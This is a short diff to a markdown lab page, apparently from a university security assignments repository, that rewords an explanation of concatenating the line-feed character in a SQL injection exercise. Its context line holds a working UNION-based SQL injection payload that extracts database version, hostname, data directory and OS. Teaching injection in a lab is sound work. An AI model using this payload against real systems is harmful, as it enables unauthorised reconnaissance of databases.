security-assignments/beta/_activities/activity_sqli.md

 ### Concatenate more host information fields

-We can concatenate 0x0a (line feed) with selected information to better display it.
+We can concatenate `0x0a` (the "line feed" character) with selected information to better display it.

 `' union select null, concat(@@version, 0x0a, @@hostname, 0x0a, @@datadir, 0x0a, @@version_compile_os) #`